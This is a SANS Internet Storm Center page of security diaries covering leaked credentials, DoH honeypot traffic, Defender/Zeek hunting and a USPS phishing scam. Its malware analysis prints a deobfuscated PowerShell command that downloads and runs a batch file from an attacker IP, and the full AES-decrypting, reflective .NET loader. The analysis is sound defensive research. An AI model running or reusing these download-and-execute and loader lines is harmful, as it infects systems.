SANS Internet Storm Center - Cooperative Cyber Security Monitor
August 4, 2023

Are Leaked Credentials Dumps Used by Attackers?, (Fri, Aug 4th)

Leaked credentials have been a common threat for a while. Popular services like "Have I Been Pwned"[1] let anyone check whether their email addresses and passwords have appeared in a leak. The problem is a classic one: one day you create an account on a website (an online shop, for example), and later that website is compromised. All its credentials are collected and shared by the attacker. To reduce this risk, the best practice is to avoid password re-use (and to avoid using your corporate email address for non-business-related sign-ups).

I've been watching dumps of leaked credentials for a long time. My goal is not to compete with the service above; I do this for research purposes and to track potential leaks affecting juicy domains. Most of the "combo" files you can find on the Internet are compilations of old leaks, but the seller presents them as "fresh", "verified" or "valid":

  • 250K-belgium-Combolist.txt
  • 300kusa.txt
  • 310k-yahoo-combos.txt
  • 75k HQ Valid mail access.txt
  • 83k mail_access.txt
  • 50K Combo private BY AmrNet1 All Site.txt
  • ...

The quality of these dumps is very poor. Most verifications I performed with third parties gave the same results: the account has not existed for a long time, the password policy has changed since, etc.

In another life, I operated a free UNIX shell service that gave users a free email address (linked to the shell access). Guess what? Many of those addresses ended up in numerous leaks (mine included). My current credentials database contains 43 unique email addresses related to my domain rootshell.be. I stopped the free shell service years ago, but the domain is still used today for personal purposes with a catch-all address, so I still receive a lot of email sent to these old addresses.

But are these leaks used to try to get access to mailboxes (or other services)?

I searched my mail server logs for rejected authentication attempts against these leaked accounts. Guess what? There are plenty! Over the last six months, 27 of the 43 unique logins (more than 50%) were tried at least once. The activity over those six months (charted in the original diary) shows attempts every day, with peaks from time to time. Here is the top ten of countries from which these connections originated:

Country         Connections
Netherlands     633
Vietnam         555
India           520
China           409
Russia          389
United States   356
South Korea     286
Brazil          247
Thailand        208
Gambia          185
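The log search described above, as an added example (it is not the author's own script): it parses Dovecot-style authentication failures, keeps only the logins that appear in a leaked-credentials list, and tallies hits per login and per source country. The log lines, mailbox names, IP addresses (documentation ranges) and the GEO mapping (a stand-in for a GeoIP database lookup) are all constructed for the example.

```python
import re
from collections import Counter

# Constructed Dovecot-style log lines (not the author's logs). One successful
# login and one Postfix line are included to show they are ignored.
SAMPLE_LOG = """\
Jul 30 03:12:45 mx dovecot: imap-login: Disconnected (auth failed, 1 attempts in 2 secs): user=<alice@example.net>, method=PLAIN, rip=192.0.2.10, lip=10.0.0.5, TLS
Jul 30 03:13:01 mx dovecot: imap-login: Disconnected (auth failed, 1 attempts in 2 secs): user=<alice@example.net>, method=PLAIN, rip=198.51.100.7, lip=10.0.0.5, TLS
Jul 30 04:40:12 mx dovecot: pop3-login: Disconnected (auth failed, 3 attempts in 9 secs): user=<bob@example.net>, method=PLAIN, rip=192.0.2.10, lip=10.0.0.5, TLS
Jul 31 11:02:33 mx dovecot: imap-login: Aborted login (auth failed, 1 attempts in 4 secs): user=<Carol@example.net>, method=LOGIN, rip=203.0.113.5, lip=10.0.0.5
Jul 31 11:02:40 mx dovecot: imap-login: Disconnected (auth failed, 1 attempts in 2 secs): user=<eve@example.net>, method=PLAIN, rip=203.0.113.5, lip=10.0.0.5, TLS
Jul 31 12:00:00 mx dovecot: imap-login: Login: user=<dave@example.net>, method=PLAIN, rip=192.0.2.99, lip=10.0.0.5, TLS
Jul 31 12:00:05 mx postfix/smtpd[4242]: connect from unknown[198.51.100.7]
""".splitlines()

# Logins found in "combo" files for our domain (constructed).
LEAKED_LOGINS = ["alice@example.net", "bob@example.net", "carol@example.net", "dave@example.net"]

# Stand-in for a GeoIP lookup (e.g. a MaxMind database); constructed mapping.
GEO = {"192.0.2.10": "NL", "198.51.100.7": "VN", "203.0.113.5": "IN"}

AUTH_FAIL_RE = re.compile(
    r"auth failed.*?user=<(?P<user>[^>]+)>.*?rip=(?P<rip>[0-9A-Fa-f.:]+)")


def parse_auth_failures(lines):
    """Yield (login, remote_ip) for every failed-authentication line."""
    for line in lines:
        m = AUTH_FAIL_RE.search(line)
        if m:
            yield m.group("user").lower(), m.group("rip")


def correlate(lines, leaked_logins, geo):
    """Count failed logins that use an address present in a leak, per login and per country."""
    leaked = {login.lower() for login in leaked_logins}
    per_login, per_country = Counter(), Counter()
    for user, rip in parse_auth_failures(lines):
        if user not in leaked:
            continue  # brute force against a login absent from the dumps: out of scope here
        per_login[user] += 1
        per_country[geo.get(rip, "unknown")] += 1
    return {
        "leaked": len(leaked),
        "seen": len(per_login),
        "share": len(per_login) / len(leaked) if leaked else 0.0,
        "per_login": per_login,
        "per_country": per_country,
    }


def report(lines=SAMPLE_LOG, leaked_logins=LEAKED_LOGINS, geo=GEO):
    r = correlate(lines, leaked_logins, geo)
    print(f"{r['seen']}/{r['leaked']} leaked logins seen in auth failures ({r['share']:.0%})")
    for country, n in r["per_country"].most_common():
        print(f"{country:8} {n}")
    return r


if __name__ == "__main__":
    report()
```

Only "auth failed" lines count, so a successful login with a leaked address (dave above) is not reported as an attack; that case deserves a separate, more urgent alert.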

Conclusion: even if the quality of these dumps is very poor, they are used a lot in the wild! This is a perfect example of why you must manage your credentials safely: with a unique password per service, one leaked site cannot be replayed against your mailbox.

[1] https://haveibeenpwned.com

Xavier Mertens (@xme)
Xameco
Senior ISC Handler - Freelance Cyber Security Consultant
PGP Key

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
August 4, 2023

ISC Stormcast For Friday, August 4th, 2023 https://isc.sans.edu/podcastdetail/8602, (Fri, Aug 4th)

August 3, 2023

From small LNK to large malicious BAT file with zero VT score, (Thu, Aug 3rd)

Last week, my spam trap caught an e-mail with an LNK attachment, which turned out to be quite interesting.

The e-mail message was the usual malspam fare trying to appear as a purchase order sent to the recipient…

…however, the attachment, named "Purchase%20Order%20PO007289.pdf.zip", was somewhat more intriguing. As you have probably guessed, it did not contain a PDF file, as its name suggested, but a 15 kB LNK file.

If one were to look at the LNK's properties using the standard Windows dialog, one would only see the following string as the "target" of the shortcut, since the textbox in that dialog only displays a fairly short string:

%ComSpec% /shakir /shakir /shakir /shakir /shakir /shakir /shakir /shakir /shakir /shakir /shakir /shakir /shakir /shakir /shakir /shakir /shakir /shakir /shakir /shakir /shakir /shakir /shakir /shakir /shakir /shakir /shakir /shakir /shakir /shakir /shakir /

Since the "target" string begins with the ComSpec variable[1], we can clearly see that the LNK points at cmd.exe (at least on any Windows system with the usual configuration), but that is about all we can be certain of at this point. To get further details, we might use a specialized tool for analyzing LNK files; however, any hex editor serves just as well.

Even without understanding the internal structure of the Shell Link file format[2], one would only have to locate the string in the file containing the many "/shakir" substrings to get to the entire command the file is supposed to execute. (The repeated "/shakir" arguments are padding: they push the real command past what the properties dialog displays.)

After exporting the entire string, removing the null bytes (the LNK stores it as UTF-16) and stripping all "/shakir" substrings (64 in total), the command the LNK was supposed to execute came down to:

cmd.exe /r %ProgramFiles(x86):~15,-6%e%ALLUSERSPROFILE:~-2,-1% "njDpgP=chas" & %ProgramFiles(x86):~15,-6%e%ALLUSERSPROFILE:~-2,-1% "AHtypC= %temp%" & %ProgramFiles(x86):~15,-6%e%ALLUSERSPROFILE:~-2,-1% "KrAYyI=t ms" & %ProgramFiles(x86):~15,-6%e%ALLUSERSPROFILE:~-2,-1% "hHdtLb=powe" & %ProgramFiles(x86):~15,-6%e%ALLUSERSPROFILE:~-2,-1% "OZHygs=20PO" & %ProgramFiles(x86):~15,-6%e%ALLUSERSPROFILE:~-2,-1% "KIDRmI=Uni." & %ProgramFiles(x86):~15,-6%e%ALLUSERSPROFILE:~-2,-1% "eIGMXx=edge" & %ProgramFiles(x86):~15,-6%e%ALLUSERSPROFILE:~-2,-1% "rMMXXr=\Pur" & %ProgramFiles(x86):~15,-6%e%ALLUSERSPROFILE:~-2,-1% "rcbQQv=0072" & %ProgramFiles(x86):~15,-6%e%ALLUSERSPROFILE:~-2,-1% "lggfDX=e -e" & ? & %ProgramFiles(x86):~15,-6%e%ALLUSERSPROFILE:~-2,-1% "EuMaFU=85.2" & %ProgramFiles(x86):~15,-6%e%ALLUSERSPROFILE:~-2,-1% "zwVAcR=.exe" & %ProgramFiles(x86):~15,-6%e%ALLUSERSPROFILE:~-2,-1% "tBZUtU=0072" & %ProgramFiles(x86):~15,-6%e%ALLUSERSPROFILE:~-2,-1% "modOVS= 'ht" & call %hHdtLb%%GkyASq%%urZjnx%%xDqWXQ%%DcsJSj%%lggfDX%%vtYPMl%%McuiOY%%WARyti%%hlKmPJ%%IWrooM%%kpOcNU%%yIRfkU%%wuntNs%%rMMXXr%%njDpgP%%TxOIYy%%kUNXaL%%rcbQQv%%wpjZWB%%amswOE%%rjCblM%%fOvOjT%%EuMaFU%%qwsiSQ%%GUAmHL%%gNfjGQ%%iqRoKc%%ZHgpuC%%OZHygs%%liqLuq%%mSgJIv%%OvOWSp%%cbMqjl%%KrAYyI%%eIGMXx%%zwVAcR%%WpZKAY%%NRgrvf%%GVZfbd%%QouxFZ%%Obyrxv%%tBZUtU%%laQBkG%%BMmBgc%%ytvSKN%%wyKZVy%%AwuLYT%%gLBeTa%%modOVS%%MnVwTd%%aBRlxU%%kmerbO%%lQOtvv%%AtAuFw%%KIDRmI%%DeCrKw%%cVoGUH%%WVnpDf%%dtSAVA%%CFWuBP%%rsZvOX%%lUfsrz%%hTyTyJ%%jufxOT%%QdicOf%%AHtypC%%HAgqdJ%%ZLbstb%

As we can see, it is obfuscated, though not heavily: every readable string is an argument to

%ProgramFiles(x86):~15,-6%e%ALLUSERSPROFILE:~-2,-1%

which uses cmd.exe's substring syntax (%VAR:~start,length%). On a default installation the first expansion yields the single character at offset 15 of "C:\Program Files (x86)" ("s") and the second the second-to-last character of "C:\ProgramData" ("t"), so the whole expression translates to "set".

The first part of the code therefore sets several (69, to be exact) variables, and the second part, beginning with the "call" command, concatenates these variables to build and execute the intended command.

Although we could deobfuscate the code by hand, since it is not too long, a much better approach is to let the obfuscated script "deobfuscate itself". All we have to do is replace the "call" command with "echo" and let the script run (inside an isolated analysis VM, naturally: the "set" commands are harmless, but it is still attacker-controlled code).
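The substring trick and the "call to echo" approach, as an added static equivalent in Python (not the author's tooling): it emulates cmd.exe's %VAR:~start,length% expansion against assumed default-install values, collects the set "NAME=value" assignments and rebuilds the command that call would have run. The sample command line is constructed in the same style as the real one; only the first variable (hHdtLb=powe) is taken from the LNK, the other names and values are made up.

```python
import re

# Assumed values of a default English Windows install (an assumption for the
# example, not taken from any analysed host).
ENV = {
    "ProgramFiles(x86)": r"C:\Program Files (x86)",
    "ALLUSERSPROFILE": r"C:\ProgramData",
    "TEMP": r"C:\Users\user\AppData\Local\Temp",
}

SUBSTR_RE = re.compile(r"%([^%:]+):~(-?\d+)(?:,(-?\d+))?%")
VAR_RE = re.compile(r"%([A-Za-z0-9_()]+)%")
SET_RE = re.compile(r'\bset\s+"([^="]+)=([^"]*)"', re.IGNORECASE)
CALL_RE = re.compile(r"\bcall\s+(.+)", re.IGNORECASE)


def cmd_substring(value, start, length=None):
    """Emulate cmd.exe's %VAR:~start,length%: a negative start counts from the
    end, a negative length drops that many characters from the end."""
    n = len(value)
    s = start if start >= 0 else max(n + start, 0)
    s = min(s, n)
    if length is None:
        e = n
    elif length >= 0:
        e = min(s + length, n)
    else:
        e = n + length
    return value[s:e] if e > s else ""


def expand_env(text, env=ENV):
    """Resolve substring expansions and plain %VAR% references against env.
    Unknown variables are left untouched (cmd would expand them to nothing,
    but keeping them makes unresolved gaps visible to the analyst)."""
    env_lc = {k.lower(): v for k, v in env.items()}

    def sub_repl(m):
        value = env_lc.get(m.group(1).lower())
        if value is None:
            return m.group(0)
        length = None if m.group(3) is None else int(m.group(3))
        return cmd_substring(value, int(m.group(2)), length)

    text = SUBSTR_RE.sub(sub_repl, text)
    return VAR_RE.sub(lambda m: env_lc.get(m.group(1).lower(), m.group(0)), text)


def deobfuscate(script, env=ENV):
    """Static equivalent of replacing `call` with `echo`: collect every
    set "NAME=value" and rebuild the command that `call` would execute."""
    text = expand_env(script, env)
    variables = {name.lower(): value for name, value in SET_RE.findall(text)}
    m = CALL_RE.search(text)
    if not m:
        return None
    resolved = VAR_RE.sub(lambda mm: variables.get(mm.group(1).lower(), mm.group(0)), m.group(1))
    return resolved.strip()


# Constructed sample in the style of the LNK's command line (only hHdtLb=powe
# is real; the other variable names and values are made up).
SAMPLE = (
    '%ProgramFiles(x86):~15,-6%e%ALLUSERSPROFILE:~-2,-1% "hHdtLb=powe" & '
    '%ProgramFiles(x86):~15,-6%e%ALLUSERSPROFILE:~-2,-1% "aaBBcc=rshe" & '
    '%ProgramFiles(x86):~15,-6%e%ALLUSERSPROFILE:~-2,-1% "ddEEff=ll -" & '
    '%ProgramFiles(x86):~15,-6%e%ALLUSERSPROFILE:~-2,-1% "ggHHii=w hi" & '
    '%ProgramFiles(x86):~15,-6%e%ALLUSERSPROFILE:~-2,-1% "jjKKll=dden" & '
    '%ProgramFiles(x86):~15,-6%e%ALLUSERSPROFILE:~-2,-1% "AHtypC= %temp%" & '
    'call %hHdtLb%%aaBBcc%%ddEEff%%ggHHii%%jjKKll%%AHtypC%'
)

if __name__ == "__main__":
    print(expand_env("%ProgramFiles(x86):~15,-6%e%ALLUSERSPROFILE:~-2,-1%"))
    print(deobfuscate(SAMPLE))
```

Unknown variables are deliberately kept as %NAME% rather than expanded to nothing, so anything the emulation could not resolve (for instance the %20 sequences in the real sample's file names) stays visible in the output.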

The entire obfuscated script came down to the following command:

powershell -noprofile -ep bypass -w hidden -c curl -o 'C:\Users\[User]\AppData\Local\Temp\Pur%njDpgP%e%20Order%20PO007289.pdf' 'http://85.208.139.229/Purchase%20Order%20PO007289.pdf'; start msedge.exe 'C:\Users\[User]\AppData\Local\Temp\Purchase%20Order%20PO007289.pdf'; curl -o C:\Users\[User]\AppData\Local\Temp\Uni.bat 'http://85.208.139.229/Uni.bat'; start -windowstyle hidden -filepath C:\Users\[User]\AppData\Local\Temp\Uni.bat

The script therefore downloads a PDF named "Purchase%20Order%20PO007289.pdf" and opens it in Microsoft Edge, then downloads a batch file named "Uni.bat" and executes it (in PowerShell, "curl" is an alias of Invoke-WebRequest and "start" of Start-Process).

Given that the LNK was named like a PDF document, downloading and opening a PDF makes complete sense and was undoubtedly intended to make it appear as if the LNK was indeed a valid document… even though the PDF didn't contain the promised purchase order, merely banking information for an unrelated company.

The batch file was almost 14 MB in size and, at the time of writing, still had a 0/59 detection rate on VirusTotal[3]…

Contrary to that result, the contents of the BAT file are far from benign… though they are fairly heavily obfuscated.

When executed, the batch file copies the local "powershell.exe" into its own directory under the name "Uni.bat.exe" (a renamed copy sidesteps detections keyed on the process name). It then uses this copy to run the following script (beautified somewhat for readability).

"Uni.bat.exe" -noprofile -windowstyle hidden -ep bypass -command function clDaz($igqAD){ $BDOYy=[System.Security.Cryptography.Aes]::Create(); $BDOYy.Mode=[System.Security.Cryptography.CipherMode]::CBC; $BDOYy.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $BDOYy.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('FtcTL30LuEgrLCRQ6F1/TYZL8DL5fU3tJLXeZWB0Mcs='); $BDOYy.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('SrREJkd4YhlCXMUuNZgEQw=='); $BOvYy=$BDOYy.CreateDecryptor(); $return_var=$BOvYy.TransformFinalBlock($igqAD, 0, $igqAD.Length); $BOvYy.Dispose(); $BDOYy.Dispose(); $return_var; } function WtwUM($igqAD){ $YAreW=New-Object System.IO.MemoryStream(,$igqAD); $Cvzjk=New-Object System.IO.MemoryStream; $qEksd=New-Object System.IO.Compression.GZipStream($YAreW, [IO.Compression.CompressionMode]::Decompress); $qEksd.CopyTo($Cvzjk); $qEksd.Dispose(); $YAreW.Dispose(); $Cvzjk.Dispose(); $Cvzjk.ToArray(); } function RUsyF($igqAD,$GoexF){ $MJUcA=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$igqAD); $TeSPg=$MJUcA.EntryPoint; $TeSPg.Invoke($null, $GoexF); } $LUpYe=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\user\AppData\Local\Temp\Uni.bat').Split([Environment]::NewLine); foreach ($SCWoC in $LUpYe) { if ($SCWoC.StartsWith('SEROXEN')) { $vJdWE=$SCWoC.Substring(7); break; }} $THBXN=[string[]]$vJdWE.Split('\'); $weYGE=WtwUM (clDaz ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($THBXN[0]))); $czNML=WtwUM (clDaz ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($THBXN[1]))); RUsyF $czNML (,[string[]] ('', 'idTznCCsreqaEEjvuwzuTuitglIVMFHEuLsTnnuHsLwyMmxaqK', 'LkIzMJCsatThEdeYOSSAwnZMOfyqejPcYtnoxQiuObLPDohIJN')); RUsyF $weYGE (,[string[]] ('', 'idTznCCsreqaEEjvuwzuTuitglIVMFHEuLsTnnuHsLwyMmxaqK', 'LkIzMJCsatThEdeYOSSAwnZMOfyqejPcYtnoxQiuObLPDohIJN'));

If we look at the last seven lines of code, we can see that the script reads the content of Uni.bat itself and extracts the text following the "SEROXEN" marker. It splits that text into two parts, each of which goes through the same pipeline: Base64 decoding, AES-CBC decryption with the hard-coded key and IV (function clDaz), and GZip decompression (function WtwUM). Note the small trick used to hide the .NET method names: 'gnirtS46esaBmorF'[-1..-16] -join '' is simply "FromBase64String" reversed, and the same goes for "Load" and "ReadAllText". The resulting content, two heavily obfuscated .NET binaries, is then reflectively loaded into memory and executed (function RUsyF).

Unlike the batch file, both components of the final infection stage [4,5] have non-zero detection rates on VirusTotal (13/70 and 17/71 respectively), though they mostly seem to be detected by generic signatures.

Therefore, if any of our readers knows which malware family the zero-scoring batch file or the subsequent .NET binaries belong to, feel free to comment or reach out to me. It would be interesting to learn more, since even platforms specializing in identifying code overlap between malware samples didn't point to anything significant for the .NET code of the final stage[6,7]…

[1] https://en.wikipedia.org/wiki/COMSPEC
[2] https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-shllink/16cb4ca1-9339-4d0c-a68d-bf1d6cc0f943
[3] https://www.virustotal.com/gui/file/8c01ef8b6a9cfa7a80fd5bcb640d68a63ef17dd25ea3e260c7971b1fa156c8be
[4] https://www.virustotal.com/gui/file/623323d7fc27927dd0c7e08208d6677ca8bf64263e38e31de00660a3156964a4
[5] https://www.virustotal.com/gui/file/0664673cd5981106172b8df9f730afa55247bf6943e5ca4f7eb7d8be2e0a15ee
[6] https://analyze.intezer.com/analyses/6838b5fc-629a-45a5-b40c-57bcabe21c3d/sub/cbf91332-c33b-4edd-9219-dc3b54e63955/
[7] https://analyze.intezer.com/analyses/ac6cf7d6-ed1d-4be2-8a65-b3f6658ed3e1/sub/f993c083-5163-4242-9f41-6aed792a3ab2/

 

Indicators of Compromise (IoCs)

IPs
85.208.139.229

Files
Purchase%20Order%20PO007289.pdf.lnk (15 kB)
MD5 304a9ab4d385a6d4c8d45002f92342fa
SHA-1 93700d836102ff1c857c880a8cad4b4387d54de9
SHA-256 e3602d0eb7149004ae6cf4befec8c6d61ac391189122744fff4a1de2cdad4aa3

Purchase%20Order%20PO007289.pdf (2134 kB)
MD5 bfd3ae8bb20e06f32f5b46100dc498c2
SHA-1 5b9ccd750f86ad1a022f8d0eba477a86ca08f6b8
SHA-256 448bf205f66888cd2661b3b7531632a4d0f1e91ccc6568de07f0fdb41f4d96f8

Uni.bat (14235 kB)
MD5 6038fb0dd91fa1e9cca80ea225d8b59b
SHA-1 98d630a01d50675988898185ac8088673409c8a0
SHA-256 8c01ef8b6a9cfa7a80fd5bcb640d68a63ef17dd25ea3e260c7971b1fa156c8be

 

TTPs associated with the campaign

T1566.001 – Phishing: Spearphishing Attachment
T1204.002 – User Execution: Malicious File
T1059.001 – Command and Scripting Interpreter: PowerShell
T1059.003 – Command and Scripting Interpreter: Windows Command Shell
T1036 – Masquerading
T1036.003 – Masquerading: Rename System Utilities
T1036.007 – Masquerading: Double File Extension
T1036.008 – Masquerading: Masquerade File Type
T1027 – Obfuscated Files or Information
T1027.010 – Obfuscated Files or Information: Command Obfuscation
T1497 – Virtualization/Sandbox Evasion
T1620 – Reflective Code Loading

-----------
Jan Kopriva
@jk0pr
Nettles Consulting

August 3, 2023

ISC Stormcast For Thursday, August 3rd, 2023 https://isc.sans.edu/podcastdetail/8600, (Thu, Aug 3rd)

August 2, 2023

ISC Stormcast For Wednesday, August 2nd, 2023 https://isc.sans.edu/podcastdetail/8598, (Wed, Aug 2nd)

August 2, 2023

Zeek and Defender Endpoint, (Wed, Aug 2nd)

 

Microsoft Defender for Endpoint has had Zeek built in since October 2022, and it comes in handy for incident response on a remote workforce, where devices spend much of their time off the corporate network. When first released it only supported a few protocols; it now supports seven. Run the following query to get the current list of inspected protocols:

DeviceNetworkEvents
| where ActionType contains 'ConnectionInspected'
| distinct ActionType

Result:

DnsConnectionInspected
SslConnectionInspected
HttpConnectionInspected
IcmpConnectionInspected
SshConnectionInspected
SmtpConnectionInspected
FtpConnectionInspected

The Zeek (formerly Bro) data is stored as JSON in the "AdditionalFields" column. For HTTP events, these fields are currently available:

direction
host
method
request_body_len
response_body_len
status_code
tags
trans_depth
uri
user_agent
version

A simple query to get all POST requests and get a feel for how it works:

DeviceNetworkEvents
| where ActionType == 'HttpConnectionInspected' and AdditionalFields contains "POST"

Quick Scenario

A device named ClickHappy received a phishing email whose link leads to IP 1.2.3.4, and the credential-harvesting web form submits via an HTTP POST. The user was off the corporate network at the time, so your usual network monitoring stack has nothing. You can ask Defender whether that device sent a POST to the site:

DeviceNetworkEvents
| where ActionType == 'HttpConnectionInspected' and AdditionalFields contains "POST" and DeviceName contains "Clickhappy" and RemoteIP == "1.2.3.4"

If the query returns a result, the user likely fell for the attack. Keep in mind that Defender does not decrypt TLS: for an HTTPS phishing site you only get the SslConnectionInspected event (server name, certificate details), not the request method.

The additional fields are JSON, so to search a specific field, parse them with todynamic(). In this case I'm looking for the user agent "gSOAP/2.7":

DeviceNetworkEvents
| where Timestamp > ago(1h) and ActionType == "HttpConnectionInspected"
| extend json = todynamic(AdditionalFields)
| extend user_agent = tostring(json.user_agent)
| where user_agent == "gSOAP/2.7"

There are many great hunts people already run against Zeek data in Security Onion, and all of them still apply to this data set. You can also pull in external data and run queries against it. Here we grab a published list of malicious user agents and join it against the last five days of HTTP events (the join is an exact, case-sensitive string match, so a bot that varies its user agent slightly will not match):

let bad_useragent = (externaldata(useragent_list: string)
[@"https://raw.githubusercontent.com/mitchellkrogza/nginx-ultimate-bad-bot-blocker/master/_generator_lists/bad-user-agents.list"]
with (format="txt"))
| project useragent_list;
bad_useragent
| join (DeviceNetworkEvents
| where Timestamp > ago(5d) and ActionType == "HttpConnectionInspected"
| extend json = todynamic(AdditionalFields)
| extend user_agent = tostring(json.user_agent)
) on $left.useragent_list == $right.user_agent

For DNS events, these are the available fields:

direction
trans_id
rtt
query
qclass
qclass_name
qtype
qtype_name
rcode
uid
rcode_name
AA
TC
RD
RA
answers
TTLs
rejected
ts

To search by queried name, use the query below:

DeviceNetworkEvents
| where ActionType == 'DnsConnectionInspected'
| extend json = todynamic(AdditionalFields)
| extend query = tostring(json.query)
| where query == "download.windowsupdate.com"

Microsoft has some great articles covering other queries and valuable details, so check them out:

https://techcommunity.microsoft.com/t5/microsoft-defender-for-endpoint/enrich-your-advanced-hunting-experience-using-network-layer/ba-p/3794693
https://techcommunity.microsoft.com/t5/microsoft-defender-for-endpoint/hunting-for-network-signatures-in-microsoft-defender-for/ba-p/3429520
August 1, 2023

Summary of DNS over HTTPS requests against our honeypots., (Tue, Aug 1st)

Our honeypots see a lot of DNS over HTTPS (DoH) requests against the "/dns-query" endpoint, the path DoH servers use to receive queries. Queries can use two encodings: the more readable URL-encoded form, like "?name=google.com&type=A", or the raw DNS wire format, base64url-encoded, like "?dns=mNwBAAABAAAAAAAABmdvb2dsZQNjb20AAAEAAQ".

Decoding the raw queries isn't hard, but note that the base64url padding ("=") is stripped at the end, as RFC 8484 requires. Some base64 implementations refuse to decode data with missing padding, so add it back before decoding.

Our database lists a total of 5,727 different URLs starting with "dns-query". Only 12 of them use the URL-encoded format, by far the most common being

/dns-query?name=baidu.com&type=A 

and 

/dns-query?name=dnsscan.shadowserver.org&type=A

A few used queries to echodns.xyz to find open resolvers. For DoH, an attacker would not use an open resolver for denial-of-service attacks (it runs over TCP, so there is no source spoofing and no amplification), but they may use it to obtain an anonymous DNS relay. Shadowserver uses these queries to populate their open resolver feed.

The remaining 5,714 queries use the DNS wire format. This format includes a query ID (RFC 8484 recommends setting it to 0 for DoH, because a varying ID defeats HTTP caching, but it is still often set), so we need to decode the names to find out which unique names are being resolved.

Query IDs appear somewhat random, with no query ID appearing more than twice, and all queries were for exactly one record, which makes decoding easier. So I channeled my inner Didier and wrote a quick Python script to decode them. For the most part, I had Google's copilot write it for me. It did a good job, I believe.

The results:

# of Requests   Hostname
5335            baidu.com
39              www.google.com
8               openresolver.dnslab.cn
2               www.example.com
1               example.com
1               download.windowsupdate.com
1               amazon.com
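A decoder of the kind described above, as an added example (it is not the author's script and the tally below is not from the honeypot data): it handles both request forms, restores the base64url padding, walks the question section of the wire-format message and tallies the names. The sample URL list is constructed: the first three paths are the ones quoted in this diary, the last two are built by the script itself to show both encodings ending up in one tally.

```python
import base64
import struct
from collections import Counter
from urllib.parse import parse_qs, urlsplit

QTYPES = {1: "A", 2: "NS", 5: "CNAME", 6: "SOA", 12: "PTR", 15: "MX",
          16: "TXT", 28: "AAAA", 33: "SRV", 65: "HTTPS", 255: "ANY"}


def b64url_decode(s):
    """RFC 8484 strips the '=' padding; add it back before decoding."""
    return base64.urlsafe_b64decode(s + "=" * (-len(s) % 4))


def b64url_encode(data):
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode("ascii")


def parse_qname(msg, offset):
    """Read a length-prefixed label sequence; returns (name, offset after it)."""
    labels = []
    while True:
        length = msg[offset]
        offset += 1
        if length == 0:
            return ".".join(labels), offset
        if length & 0xC0:
            raise ValueError("compression pointer in a question name")
        labels.append(msg[offset:offset + length].decode("ascii", "replace"))
        offset += length


def decode_dns_query(wire):
    """Decode the header and question section of a DNS wire-format message."""
    if len(wire) < 12:
        raise ValueError("shorter than a DNS header")
    qid, flags, qdcount, _an, _ns, _ar = struct.unpack("!6H", wire[:12])
    offset, questions = 12, []
    for _ in range(qdcount):
        name, offset = parse_qname(wire, offset)
        qtype, _qclass = struct.unpack("!HH", wire[offset:offset + 4])
        offset += 4
        questions.append((name, QTYPES.get(qtype, str(qtype))))
    return {"id": qid, "rd": bool(flags & 0x0100), "questions": questions}


def build_query(name, qtype=1, qid=0):
    """Wire-format query with RD set (RFC 8484 recommends ID 0); used to build samples."""
    qname = b"".join(bytes([len(l)]) + l.encode("ascii") for l in name.split(".")) + b"\x00"
    return struct.pack("!6H", qid, 0x0100, 1, 0, 0, 0) + qname + struct.pack("!HH", qtype, 1)


def names_from_doh_url(url):
    """Return [(name, qtype)] for either DoH request form, [] for anything else."""
    qs = parse_qs(urlsplit(url).query)
    if "dns" in qs:
        return decode_dns_query(b64url_decode(qs["dns"][0]))["questions"]
    if "name" in qs:
        return [(qs["name"][0], qs.get("type", ["A"])[0].upper())]
    return []


def tally(urls):
    counts = Counter()
    for url in urls:
        for name, _qtype in names_from_doh_url(url):
            counts[name.lower().rstrip(".")] += 1
    return counts


# Constructed sample of request paths (first three quoted in the diary).
SAMPLE_URLS = [
    "/dns-query?dns=mNwBAAABAAAAAAAABmdvb2dsZQNjb20AAAEAAQ",
    "/dns-query?name=baidu.com&type=A",
    "/dns-query?name=dnsscan.shadowserver.org&type=A",
    "/dns-query?dns=" + b64url_encode(build_query("baidu.com", qid=0x1234)),
    "/dns-query?dns=" + b64url_encode(build_query("www.example.com", qtype=28)),
]

if __name__ == "__main__":
    for name, n in tally(SAMPLE_URLS).most_common():
        print(f"{n:>5} {name}")
```

The diary's own example decodes to a query for google.com, type A, with ID 0x98DC and the RD bit set; since the ID is the only thing that varies between otherwise identical queries, tallying on the decoded name collapses them as intended.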

Many of the requests originate from Alibaba's cloud. Interestingly, the user agent is just the word "Chrome" for many of these queries, indicating that a specific tool is likely used for these scans.

In summary, aside from some researchers, scans for open DNS over HTTP(s) resolvers are likely used to anonymize browsing traffic. We do not have sufficient data to see what they are looking for. Even configuring one of our honeypots as an open resolver has not yielded more exciting results.

---
Johannes B. Ullrich, Ph.D. , Dean of Research, SANS.edu

August 1, 2023

ISC Stormcast For Tuesday, August 1st, 2023 https://isc.sans.edu/podcastdetail/8596, (Tue, Aug 1st)

July 31, 2023

ISC Stormcast For Monday, July 31st, 2023 https://isc.sans.edu/podcastdetail/8594, (Mon, Jul 31st)

July 30, 2023

USPS Phishing Scam Targeting iOS Users, (Sun, Jul 30th)

Phishing scams have frequently arrived as SMS messages (sometimes called "smishing"). SMS messages are easy and cheap to send, and we have documented how attackers like to scan for exposed credentials for services like Twilio to make it even cheaper.

But today, I received a message on my Apple devices that didn't arrive as a green SMS but as a blue iMessage (screenshot in the original diary).

As I always do, I clicked on the link on my Mac. But I was immediately redirected to the legitimate USPS page (usps.com). It didn't matter whether I used Safari or Chrome on macOS. So I tried Safari on my iPhone and was directed to the phishing page.

The page appears to attempt to collect credit card numbers. I didn't feel charitable enough to provide a real credit card number, so I am unsure if it would ask for any additional information.

The main domain (deliverocy.com) does not resolve. I tried a few other hostnames (fedex, www, ups...), but none of them resolved either. +639468743057 is a number in the Philippines. I did try a FaceTime call, but nobody picked up :(

The site's '/admin' URL presents a login screen for some kind of admin system. The background image appears to come from "Ghostblade". The admin part of the site did not restrict the user-agent like the phishing part of the site.

